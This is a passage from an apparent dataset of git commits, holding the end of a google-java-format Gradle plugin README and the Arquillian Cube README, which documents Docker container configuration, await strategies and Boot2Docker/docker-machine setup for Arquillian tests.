project.\n\nimage:https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin.svg?branch=master[\"Build\nStatus\",\nlink=\"https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin\"]\n\n== Quick Start\n* Apply the plugin in your build script (follow https:\/\/plugins.gradle.org\/plugin\/com.github.sherter.google-java-format[these instructions]\nfor Gradle versions below `2.1`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\nplugins {\n id 'com.github.sherter.google-java-format' version '{release-version}'\n}\n----\n+\n\n* Make sure you have defined a repository that contains version `{default-google-java-format-version}` of `google-java-format`\n+\n[source,groovy]\n----\nrepositories {\n jcenter() \/\/ or mavenCentral()\n}\n----\n\n* Execute the task `googleJavaFormat` to format all `*.java` files in the project\n+\n[source,shell]\n----\n$ .\/gradlew goJF\n----\n+\n* Execute the task `verifyGoogleJavaFormat` to verify that all `*.java` files are formatted properly\n+\n[source,shell]\n----\n$ .\/gradlew verGJF\n----\n\n== Extended Usage\n* The plugin adds the extension `googleJavaFormat` to your project. Adjust the variable `toolVersion` to use a specific version of `google-java-format`. You can even define `SNAPSHOT` versions, but make sure that you have added a repository to the project that contains this version (e.g. `mavenLocal()`). For plugin version `{release-version}` this value defaults to `{default-google-java-format-version}`. On every new release the default value will be updated to the latest version of `google-java-format`.\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ngoogleJavaFormat {\n toolVersion '0.1-SNAPSHOT'\n}\n----\n\n* The predefined tasks `googleJavaFormat` and `verifyGoogleJavaFormat` by default process all `*.java` files found in the project or any subproject (except for files in a `buildDir`). If you want to exclude specific files from a predefined task you can use https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[Ant-style exclude patterns].\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.googleJavaFormat {\n exclude '**\/*Template.java'\n exclude 'src\/test\/template_*'\n}\n----\n\n* Define your own format or verification tasks, if the predefined ones don't suite you needs. Both task types `GoogleJavaFormat` and `VerifyGoogleJavaFormat` are subtypes of `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/SourceTask.html[SourceTask]` and can be configured accordingly. 
The task type `VerifyGoogleJavaFormat` also implements the interface `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/VerificationTask.html[VerificationTask]`.\n+\n[source,groovy]\n----\nimport com.github.sherter.googlejavaformatgradleplugin.GoogleJavaFormat\nimport com.github.sherter.googlejavaformatgradleplugin.VerifyGoogleJavaFormat\n\ntask format(type: GoogleJavaFormat) {\n source 'src\/main'\n source 'src\/test'\n include '**\/*.java'\n exclude '**\/*Template.java'\n}\n\ntask verifyFormatting(type: VerifyGoogleJavaFormat) {\n source 'src\/main'\n include '**\/*.java'\n ignoreFailures true\n}\n----\n\n== Snapshots\nOn every push to the master branch https:\/\/travis-ci.org\/[Travis] runs\nthe tests and, if all tests pass, publishes the built artifact to\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/[Sonatype's\n`snapshots` repository]. Use the following build script snippet for\nthe current snapshot version:\n\n[source,groovy]\n[subs=\"attributes\"]\n----\nbuildscript {\n repositories {\n maven {\n url 'https:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/'\n }\n }\n dependencies {\n classpath 'com.github.sherter.googlejavaformatgradleplugin:google-java-format-gradle-plugin:{snapshot-version}'\n }\n}\n\napply plugin: 'com.github.sherter.google-java-format'\n----\n\n=== New Features\n* Support for options:\n+\n[source,groovy]\n----\ngoogleJavaFormat {\n options <type>: <value>, <type>: <value>, ... \/\/ e.g. options style: 'AOSP'\n}\n----\n|===\n|option | possible values\n\n|style\n|'GOOGLE', 'AOSP'\n|===\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1eeb18daac3fccc65312124ddb82d435c86eba21","subject":"Replace links to previous docs to 3 latest releases","message":"Replace links to previous docs to 3 latest releases\n","repos":"lordofthejars\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,spolti\/arquillian-cube,spolti\/arquillian-cube,spolti\/arquillian-cube,mikesir87\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Arquillian Cube\n\nDocumentation for version Alpha6 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha6\/README.adoc\n\nDocumentation for version Alpha5 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha5\/README.adoc\n\nDocumentation for version Alpha4 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha4\/README.adoc\n\n\nWARNING: 1.0.0.Alpha7 breaks compatibility with previous versions in some cases. The major difference is that instead of using the _boot2docker_ keyword to refer to the auto resolved boot2docker ip in the _serverUri_ parameter, you should now use _dockerHost_.\n\n== What is this?\n\n*Arquillian Cube* is an _Arquillian_ extension that can be used to manage _Docker_ containers from _Arquillian_.\n\nThe extension is named *Cube* for two reasons:\n\n* Because Docker is like a cube\n* Because the http:\/\/en.memory-alpha.org\/wiki\/Borg_cube[Borg starship] is named *cube* and, well, because we are moving tests closer to production we can say that \"any resistance is futile, bugs will be assimilated\".\n\nWith this extension you can start a _Docker_ container with a server installed, deploy the required deployable file within it and execute _Arquillian_ tests.\n\nThe key point here is that if _Docker_ is used as the deployable platform in production, your tests are executed in the same container as will be used in production, so your tests are even more real than before.\n\nBut it also lets you start a container with every required service like database, mail server, ... and instead of stubbing or using fake objects your tests can use real servers.\n\n[WARNING]\n====\nThis extension has been developed and tested on a Linux machine with the _Docker_ server already installed.\nIt works with *Boot2Docker* as well in _Windows_ and _MacOS_ machines, but some parameters like _host ip_ must be the _Boot2Docker_ server instead of _localhost_ (in case you have the _Docker_ server installed inside your own machine).\n\nOne of the best resources to learn about why using _Boot2Docker_ is different from using _Docker_ in Linux can be read here http:\/\/viget.com\/extend\/how-to-use-docker-on-os-x-the-missing-guide\n====\n\n== Preliminaries\n\n*Arquillian Cube* relies on the https:\/\/github.com\/docker-java\/docker-java[docker-java] API.\n\nTo use *Arquillian Cube* you need a _Docker_ daemon running on a computer (it can be local or not), but probably it will be local.\n\nBy default the _Docker_ server uses UNIX sockets for communicating with the _Docker_ client. *Arquillian Cube* will attempt to detect the operating system it is running on and either set _docker-java_ to use a UNIX socket on _Linux_ or to <<Boot2Docker>> on _Windows_\/_Mac_ as the default URI.\n
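\nFor instance, you can quickly check that the daemon answers on the default UNIX socket (a sanity-check sketch, assuming a local Linux installation with the _Docker_ client on the PATH):\n\n[source, terminal]\n----\n$ docker -H unix:\/\/\/var\/run\/docker.sock version\n----\n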
\nIf you want to use TCP\/IP to connect to the Docker server, you'll need to make sure that your _Docker_ server is listening on a TCP port.\nTo allow the _Docker_ server to use TCP add the following line to +\/etc\/default\/docker+:\n\n+DOCKER_OPTS=\"-H tcp:\/\/127.0.0.1:2375 -H unix:\/\/\/var\/run\/docker.sock\"+\n\nAfter restarting the _Docker_ daemon you need to make sure that _Docker_ is up and listening on TCP.\n\n[source, terminal]\n----\n$ docker -H tcp:\/\/127.0.0.1:2375 version\n\nClient version: 0.8.0\nGo version (client): go1.2\nGit commit (client): cc3a8c8\nServer version: 1.2.0\nGit commit (server): fa7b24f\nGo version (server): go1.3.1\n----\n\nIf you cannot see the client and server versions then it means that something is wrong with the _Docker_ installation.\n\n== Basic Example\n\nAfter having a _Docker_ server installed we can start using *Arquillian Cube*.\nIn this case we are going to use a very simple example using a _Docker_ image with _Apache Tomcat_ and we are going to test a _Servlet_ on it.\n\n[source, java]\n.HelloWorldServlet.java\n----\n@WebServlet(\"\/HelloWorld\")\npublic class HelloWorldServlet extends HttpServlet {\n\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n PrintWriter writer = resp.getWriter();\n writer.println(\"Hello World\");\n }\n}\n----\n\n[source, java]\n.HelloWorldServletTest.java\n----\n@RunWith(Arquillian.class)\npublic class HelloWorldServletTest {\n\n @Deployment(testable=false) \/\/<1>\n public static WebArchive create() {\n return ShrinkWrap.create(WebArchive.class, \"hello.war\").addClass(HelloWorldServlet.class); \/\/<2>\n }\n\n @Test\n public void should_parse_and_load_configuration_file(@ArquillianResource URL resource) throws IOException { \/\/<3>\n\n URL obj = new URL(resource, \"HelloWorld\");\n HttpURLConnection con = (HttpURLConnection) obj.openConnection();\n con.setRequestMethod(\"GET\");\n\n BufferedReader in = new BufferedReader(\n new InputStreamReader(con.getInputStream()));\n String inputLine;\n StringBuffer response = new StringBuffer();\n\n while ((inputLine = in.readLine()) != null) {\n response.append(inputLine);\n }\n in.close();\n\n assertThat(response.toString(), is(\"Hello World\"));\/\/<4>\n }\n}\n----\n<1> In this case we are running the test as a client. So in fact this test is executed against the container instead of inside the container.\n<2> No changes in this part, we need to create a deployable file, and because we are testing against _Tomcat_, a _war_ file is created.\n<3> Because the test is run as a client, we can use +@ArquillianResource+ to get the URL where the file is deployed. 
Note that this will be the URL to access _Tomcat_ running inside the _Docker_ container.\n<4> A typical JUnit assertion of the servlet response.\n\nNow this test could be run in any container; there is nothing that ties this to _Docker_.\nThe next step is adding some dependencies apart from the typical _Arquillian_ dependencies.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-docker<\/artifactId> <!--1-->\n <version>${project.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n\n<dependency>\n <groupId>org.jboss.arquillian.container<\/groupId>\n <artifactId>arquillian-tomcat-remote-7<\/artifactId> <!--2-->\n <version>1.0.0.CR7<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n<1> Adds the *Arquillian Cube* dependency.\n<2> From the point of view of _Arquillian_, _Tomcat_ is being executed on a remote host (in fact this is true because _Tomcat_ is running inside _Docker_ which is external to _Arquillian_), so we need to add the remote adapter.\n\nAnd finally we need to configure the _Tomcat_ remote adapter and *Arquillian Cube* in the +arquillian.xml+ file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\"> <!--1-->\n <property name=\"serverVersion\">1.12<\/property> <!--2-->\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property> <!--3-->\n <property name=\"dockerContainers\"> <!--4-->\n tomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"tomcat\" default=\"true\"> <!--5-->\n <configuration>\n <property name=\"host\">localhost<\/property> <!--6-->\n <property name=\"httpPort\">8080<\/property> <!--7-->\n <property name=\"user\">admin<\/property> <!--8-->\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The *Arquillian Cube* extension is registered.\n<2> The _Docker_ server version is required.\n<3> The _Docker_ server URI is required. In case you are using a remote _Docker_ host or _Boot2Docker_ here you need to set the remote host ip, but in this case the _Docker_ server is on the same machine.\n<4> A _Docker_ container contains a lot of parameters that can be configured. To avoid having to create one XML property for each one, a YAML content can be embedded directly as the property.\n<5> Configuration of the _Tomcat_ remote adapter. Cube will start the _Docker_ container when it is run in the same context as an _Arquillian_ container with the same name.\n<6> Host can be _localhost_ because there is a port forwarding between the container and the _Docker_ server.\n<7> Port is exposed as well.\n<8> User and password are required to deploy the war file to the remote _Tomcat_.\n\nAnd that's all.\nNow you can run your test and you will see how the _tutum\/tomcat:7.0_ image is downloaded and started.\nPorts 8080 (Tomcat standard port) and 8089 (JMX port used by Arquillian) are exposed.\nFinally, in the _env_ section, environment variables are set.\nRead the next link to understand why this is required: https:\/\/docs.jboss.org\/author\/display\/ARQ\/Tomcat+7.0+-+Remote\n
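\nWith everything wired up, running the test is just a regular build run (a usage sketch, assuming a standard Maven project layout):\n\n[source, terminal]\n----\n$ mvn test\n----\n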
\n== Configuration\n\n*Arquillian Cube* requires some parameters to be configured, some related to the _Docker_ server and others related to the image that is being used.\nLet's see the valid attributes:\n\n[cols=\"2*\"]\n|===\n|serverVersion\n|Version of the REST API provided by the _Docker_ server. You should check on the _Docker_ site which version of the REST API is shipped inside the installed _Docker_ service. This field is not mandatory and if it's not set the default provided version from _docker-java_ will be used.\n\n|serverUri\n|URI of the _Docker_ server. If the _Docker_ server is running natively on Linux then this will be a URI pointing to the _localhost_ docker host but if you are using _Boot2Docker_ or a remote _Docker_ server then the URI should be changed to point to the _Docker_ remote _URI_. It can be a unix socket URI as well in case you are running _Docker_ on Linux (+unix:\/\/\/var\/run\/docker.sock+). You can also read <<automatic-resolution, this section>> about automatic resolution of the serverUri parameter. You can also use the `DOCKER_HOST` java property or system environment to set this parameter.\n\n|dockerRegistry\n|Sets the location of the Docker registry. The default value is the official _Docker_ registry located at https:\/\/registry.hub.docker.com\n\n|dockerContainers\n|Each _Docker_ image (or container) can be configured with different parameters. This configuration is provided in YAML format. This property can be used to embed all the configuration as a YAML string value.\n\n|dockerContainersFile\n|Instead of embedding YAML as a string, you can set the location of a YAML file with this attribute. The location can be relative to the root of the project or also a URI that is converted to a URL so you can effectively have docker definitions on remote sites.\n\n|definitionFormat\n|Sets the format of the content expressed in the `dockerContainers` attribute or in the file set in `dockerContainersFile`. It can contain two possible values: _CUBE_ (the default if not set) to indicate that content is written following the <<cube-format, Arquillian Cube>> format or _COMPOSE_ to indicate that content is written following the <<docker-compose-format, Docker Compose>> format.\n\n|autoStartContainers\n|Cube will normally only start a _Docker_ container when it has the same name as an active _Arquillian_ container. That works for things that are _DeployableContainer_'s. For any other service, e.g. a database, you can use the _autoStartContainers_ option to define which _Docker_ containers to automatically start up. The option takes a comma-separated list of _Docker_ container ids, e.g. _tomcat7, mysql_. *Arquillian Cube* will attempt to start the containers in parallel if possible as well as start any linked containers.\n\n|certPath\n|Path where certificates are stored. If you are not using the _https_ protocol this parameter is not required. This parameter accepts paths starting with ~ as the home directory\n\n|boot2dockerPath\n|Sets the full location (and program name) of _boot2docker_. For example +\/opt\/boot2dockerhome\/boot2docker+.\n\n|dockerMachinePath\n|Sets the full location (and program name) of _docker-machine_. For example +\/opt\/dockermachinehome\/docker-machine+.\n\n|machineName\n|Sets the machine name in case you are using docker-machine to manage your docker host. This parameter is mandatory when using docker-machine.\n\n|connectionMode\n|Connection Mode to bypass the Create\/Start Cube commands if a Docker Container with the same name is already running on the target system. This parameter can receive three possible values. _STARTANDSTOP_ is the default one if none is set and simply creates and stops all Docker Containers. If a container is already running, an exception is thrown. _STARTORCONNECT_ mode tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if that is the case it doesn\u2019t stop it at the end. But if the container is not already running, Cube will start one and stop it at the end of the execution. And the last mode is _STARTORCONNECTANDLEAVE_, which is exactly the same as _STARTORCONNECT_ but if the container is started by Cube it won\u2019t be stopped at the end of the execution so it can be reused in the next executions.\n|===\n
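\nFor instance, the extension can point to an external definition file instead of embedding the YAML (a configuration sketch; the file name shown is hypothetical):\n\n[source, xml]\n----\n<extension qualifier=\"docker\">\n <property name=\"serverUri\">unix:\/\/\/var\/run\/docker.sock<\/property>\n <property name=\"dockerContainersFile\">src\/test\/resources\/containers.yml<\/property>\n<\/extension>\n----\n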
\nSome of these properties can be provided by using standard Docker system environment variables so you can set them once and use them in your tests too.\nMoreover you can set them as Java system properties (-D...) as well.\n\n[cols=\"2*\"]\n|===\n|serverUri\n|DOCKER_HOST\n\n|certPath\n|DOCKER_CERT_PATH\n\n|machineName\n|DOCKER_MACHINE_NAME\n|===\n\nIn the next example you can see a whole YAML document with configuration properties.\nKeep in mind that almost all of them are configuration parameters provided by the _Docker_ remote API.\nIn this example we are going to explain the most used attributes and special cases.\nOf course not all of them are mandatory:\n\nNOTE: In YAML adding brackets (\"[\" \"]\") is for setting a list.\n\n[[cube-format]]\n[source, yaml]\n----\ntomcat: #1\n image: tutum\/tomcat:7.0 #2\n exposedPorts: [8089\/tcp] #3\n await: #4\n strategy: polling #5\n workingDir: .\n alwaysPull: false\n disableNetwork: true\n hostName: host\n portSpecs: [80,81]\n user: alex\n tty: true\n stdinOpen: true\n stdinOnce: true\n memoryLimit: 1\n memorySwap: 1\n cpuShares: 1\n cpuSet: a\n extraHosts: a\n attachStdin: true\n attachStderr: true\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089] #6\n cmd: [] #7\n dns: [127.0.0.1]\n volumes: [\/tmp]\n volumesFrom: [tomcat]\n binds:\n - \/host:\/container:ro\n links:\n - name:alias\n - name2:alias2\n portBindings: [8089\/tcp, 8081->8080\/tcp] #8\n privileged: true\n publishAllPorts: true\n networkMode: host\n dnsSearch: [127.0.0.1]\n entryPoint: [sh]\n devices:\n cGroupPermissions: a\n pathOnHost: b\n pathInContainer: c\n restartPolicy:\n name: failure\n maximumRetryCount: 1\n capAdd: [a]\n capDrop: [b]\n extends: container-id #9\n----\n<1> The name that is going to be assigned to the running container. It is *mandatory*.\n<2> The name of the image to be used. It is *mandatory*. If the image has not already been pulled by the _Docker_ server, *Arquillian Cube* will pull it for you. If you want to always pull the latest image before the container is created, you can configure *alwaysPull: true*.\n<3> Sets the exposed ports of the running container. It should follow the format _port number_, slash (\/) and _protocol_ (udp or tcp). Note that it is a list and it is not mandatory.\n<4> After a container is started, it starts booting up the defined services\/commands. Depending on the nature of the service, the lifecycle of these services is linked to the start up or not. 
For example Tomcat, WildFly, TomEE and in general all Java servers must be started in the foreground and this means that from the point of view of the client, the container never finishes starting. But on the other side other services like Redis are started in the background and when the container is started you can be sure that the Redis server is there. To avoid executing tests before the services are ready, you can set which await strategy should be used from the *Arquillian Cube* side to accept that the _Docker_ container and all its defined services are up and ready. It is not mandatory and by default the polling with _ss_ command strategy is used.\n<5> In +strategy+ you set which strategy you want to follow. Currently three strategies are supported: _static_, _native_ and _polling_.\n<6> You can pass environment variables by using `env`. In this section you can set the special `dockerServerIp` string, which at runtime will be replaced by _Cube_ with the current docker server ip.\n<7> After the container is up, a list of commands can be executed within it.\n<8> Port forwarding is configured using the `portBinding` section. It contains a list of `exposedPort` and `port` separated by an arrow (_->_). If only one port is provided, *Arquillian Cube* will expose the same port number. In this example the exposed port 8089 is mapped to 8089 and the exposed port 8080 is mapped to 8081.\n<9> You can extend another configuration. Any top level element and its children from the target container-id will be copied over to this configuration, unless they have been defined here already.\n\nAs we've seen in the basic example, the definition of the Arquillian Cube scenarios is described in the `dockerContainers` property.\nBut if you want you can avoid using this property by simply creating a file called `cube` in the root of the classpath of your project.\n_Arquillian Cube_ will read it as if it was defined in the `arquillian.xml` file.\n\n[source, yaml]\n.src\/test\/resources\/cube\n----\ntomcat:\n image: tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n----\n\n=== Await\n\nAfter a container is started, it starts booting up the defined services\/commands.\nDepending on the nature of the service, the lifecycle of these services is linked to the start up or not.\nFor example Tomcat, WildFly, TomEE and in general all Java servers must be started in the foreground and this means that from the point of view of the _Docker_ client, the container never finishes starting.\nBut on the other side other services like Redis are started in the background and when the container is started you can be sure that the Redis server is there.\nTo avoid executing tests before the services are ready, you can set which await strategy should be used from the *Arquillian Cube* side to accept that the _Docker_ container and all its defined services are up and ready.\n\nCurrently the next await strategies are supported:\n\nnative:: it uses the *wait* command. In this case the current thread waits until the _Docker_ server notifies that the container has started. In case of foreground services this is not the approach to be used.\npolling:: in this case a polling (with the _ping_ or _ss_ command) is executed for 5 seconds against all exposed ports. When communication to all exposed ports is acknowledged, the container is considered to be up. 
This approach is the one to be used in case of services started in the foreground. By default _polling_ executes the _ss_ command inside the running container to know if the server is already running. You can use a _ping_ from the client by setting the +type+ attribute to +ping+. Note that _ping_ only works if you are running the _Docker_ daemon on +localhost+. In almost all cases the default behaviour matches all scenarios. If it is not specified, this is the default strategy.\nstatic:: similar to _polling_ but it uses the host ip and the specified list of ports provided as a configuration parameter. This can be used in case of using _Boot2Docker_.\nsleeping:: sleeps the current thread for the specified amount of time. You can specify the time in seconds or milliseconds.\n\nBy default, in case you don't specify any _await_ strategy, polling with the _ss_ command is used.\n\n[source, yaml]\n.Example native\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: native\n----\n\n[source, yaml]\n.Example polling using ss command by default\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n sleepPollingTime: 200 s #1\n iterations: 3 #2\n----\n<1> Optional parameter to configure the sleeping time between pollings. You can set it in seconds using _s_ or milliseconds using _ms_. By default the time unit is milliseconds and the value 500.\n<2> Optional parameter to configure the number of retries to be done. By default 10 iterations are done.\n\n[source, yaml]\n.Example static\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: static\n ip: localhost\n ports: [8080, 8089]\n----\n\n[source, yaml]\n.Example sleeping\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: sleeping\n sleepTime: 200 s #1\n----\n<1> Optional parameter to configure the sleeping time. You can set it in seconds using _s_ or milliseconds using _ms_. By default the time unit is milliseconds and the value 500.\n\n=== Inferring exposedPorts from portBinding\n\nWhen you are using _Docker_ you can set two different parameters, +exposedPort+ and +portBinding+.\n+exposedPorts+ are ports that are available inside the _Docker_ infrastructure and they are used for communication between _Docker_ containers but not from outside.\nOn the other side +portBindings+ are a way to instruct the _Docker_ container to publish a port to be available from outside (for example from our test).\n\nIt seems reasonable that if you set a port binding this port should automatically be an exposed port as well.\nFor this reason in *Arquillian Cube* you can use +portBinding+ and it will automatically be set as an exposed port.\n\nIn the next example we are only setting +portBinding+ and *Arquillian Cube* will instruct _Docker_ to expose port 8080 and of course bind the port 8080 so it can be accessible from outside.\n\n[source, yaml]\n.arquillian.xml\n----\ndaytime:\n buildImage:\n dockerfileLocation: src\/test\/resources\/undertow\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n----\n\nAlso it is not necessary to set the network protocol (tcp or udp).\nIf the protocol is not specified, as in `portBindings: [\"8080\"]`, then _tcp_ is used by default.\nNotice that you need to add double-quotes to stringify the value.\n\n=== Allow connecting to a running container\n\nWith the configuration option +connectionMode+ you can bypass\nthe Create\/Start Cube commands if a _Docker_ Container with the same name is already\nrunning on the target system. 
If so, *Arquillian Cube* will reuse that Container moving forward.\n\nThis allows you to prestart the containers manually during development and just\nconnect to them to avoid the extra cost of starting the _Docker_ Containers for each test\nrun. This assumes you are not changing the actual definition of the _Docker_ Container itself.\n\nAn example of this configuration could be:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"connectionMode\">STARTORCONNECT<\/property>\n <property name=\"dockerContainers\">\n tomcat:\n #more properties\n <\/property>\n<\/extension>\n----\n\n+connectionMode+ is an attribute that can receive three parameters:\n\nSTARTANDSTOP:: it is the default one if none is set, and simply creates and stops all _Docker_ Containers. If a container is already running, an exception is thrown.\nSTARTORCONNECT:: it tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if that is the case it doesn\u2019t stop it at the end. But if the container is not already running, Cube will start one and stop it at the end of the execution.\nSTARTORCONNECTANDLEAVE:: it is exactly the same as _STARTORCONNECT_, but if the container is started by Cube it won\u2019t be stopped at the end of the execution, so it can be reused in the next executions.\n\n=== Before Stop Events\n\nSometimes when the tests have finished and the container is stopped, you want to inspect some data, like the container console, or get a file from the container for manual inspection.\nIn these cases you can configure each container to copy the console log or copy files from the container to the local machine just before the container is stopped.\n\nThe next snippet shows how to copy a directory from the container to the local disk:\n\n[source, yaml]\n----\ntomcat_default:\n image: tutum\/tomcat:7.0\n beforeStop: # <1>\n - copy: # <2>\n from: \/test\n to: \/tmp\n\n - log: # <3>\n to: \/tmp\/container.log\n----\n<1> +beforeStop+ goes into the container section and may contain a list of +copy+ and +log+ elements.\n<2> +copy+ is used to notify that we want to copy some directories or files from the +from+ container location to the +to+ local location.\n<3> +log+ is used to notify that we want to copy the container log to the +to+ local location.\n\nIn case of the +log+ command, the standard output and the error output are returned.\nThe +log+ _Docker_ command can receive some configuration parameters and you can set them in the configuration file too.\n\n[source, yaml]\n.Example of log parameters\n----\nbeforeStop:\n - log:\n to: \/tmp\/container.log\n follow: true\n stdout: true\n stderr: false\n timestamps: true\n tail: 10\n----\n\n[[automatic-resolution]]\n=== Automatic serverUri resolution\n\nThe +serverUri+ parameter is where you configure the URI of the _Docker_ server.\nThis parameter is not mandatory and in case you don't set it, _Arquillian Cube_ will use the next values:\n\n[cols=\"2*\"]\n|===\n|Linux\n|unix:\/\/\/var\/run\/docker.sock\n\n|Windows\n|https:\/\/dockerHost:2376\n\n|MacOS\n|https:\/\/dockerHost:2376\n\n|Docker Machine\n|https:\/\/dockerHost:2376\n|===\n\n[[boot2docker]]\n== Boot2Docker and Docker Machine\n\nIf you are using _boot2docker_ or _docker machine_ there are some parameters that depend on the local installation.\nFor example the _boot2docker_ ip is not _localhost_ and may change every time you start a new _boot2docker_ instance.\nAlso, every time it starts, _boot2docker_ copies 
[[boot2docker]]\n== Boot2Docker and Docker Machine\n\nIf you are using _boot2docker_ or _docker machine_ there are some parameters that depend on the local installation.\nFor example the _boot2docker_ ip is not _localhost_ and may change every time you start a new _boot2docker_ instance.\nAlso, every time you start it, _boot2docker_ copies the required certificates to the home directory of the local machine.\n\n_Arquillian Cube_ offers some automatic mechanisms to use _boot2docker_ or _docker machine_ in _Cube_.\n\nThe first one is that the +serverUri+ parameter can contain the word +dockerHost+, as in +https:\/\/dockerHost:2376+.\nWhen _Cube_ is started it will check if the +serverUri+ contains the _dockerHost_ word, and if that is the case it will do the following:\n\n. if the docker machine name is provided by using the +machineName+ property, then the Docker Machine command is run to get the ip that replaces `dockerHost`.\n. if the previous condition is not met, then the _boot2docker_ command is run to get the ip that replaces `dockerHost`.\n\n=== Boot2Docker\n\nIn case of _boot2docker_ it will run the command +boot2docker ip+ to get the ip and substitute the _dockerHost_ keyword with the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that the +boot2docker+ command is on the +PATH+, but you can configure its location by using the +boot2dockerPath+ property, which is the full location (and program name) of _boot2docker_.\nFor example +\/opt\/boot2dockerhome\/boot2docker+.\n\n_boot2docker_ runs over _https_ and you need to set the certificates path.\nThese certificates are copied by _boot2docker_ by default to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+.\nIf this property is not set and the +serverUri+ contains +dockerHost+, then this property is automatically configured to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+, so you don't need to worry about setting it for each environment.\n\n=== Docker Machine\n\nIn case of _docker-machine_ it will run the command +docker-machine ip <machineName>+ to get the ip and substitute the _dockerHost_ keyword with the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that the +docker-machine+ command is on the +PATH+, but you can configure its location by using the +dockerMachinePath+ property, which is the full location (and program name too) of _docker-machine_.\nFor example +\/usr\/bin\/docker-machine+.\n\n_docker-machine_ can run together with _boot2docker_.\nThis docker host instance runs over _https_, so you need to set the certificates path.\nThese certificates are copied by _docker-machine_ by default to +<HOME>\/.docker\/machine\/machines+.\nIf this property is not set and _docker-machine_ is run, then this property is automatically configured to the default location, so you don't need to worry about setting it for each environment.\n\nFor example you can configure the +arquillian.xml+ file to use _docker-machine_ as:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">${docker.api.version}<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"machineName\">dev<\/property> <!-- 1 -->\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n----\n<1> Sets the docker machine to _dev_.\n\nNotice that you only need to add the _machineName_ property; everything else is exactly the same as in previous examples.\n
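\nUnder the hood this is equivalent to resolving the ip yourself, so a quick way to check what _Cube_ will use is to run the same command manually. A sketch, using the machine name _dev_ from the example above (the ip shown is just illustrative):\n\n[source, terminal]\n----\n$ docker-machine ip dev\n192.168.99.100\n----\n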
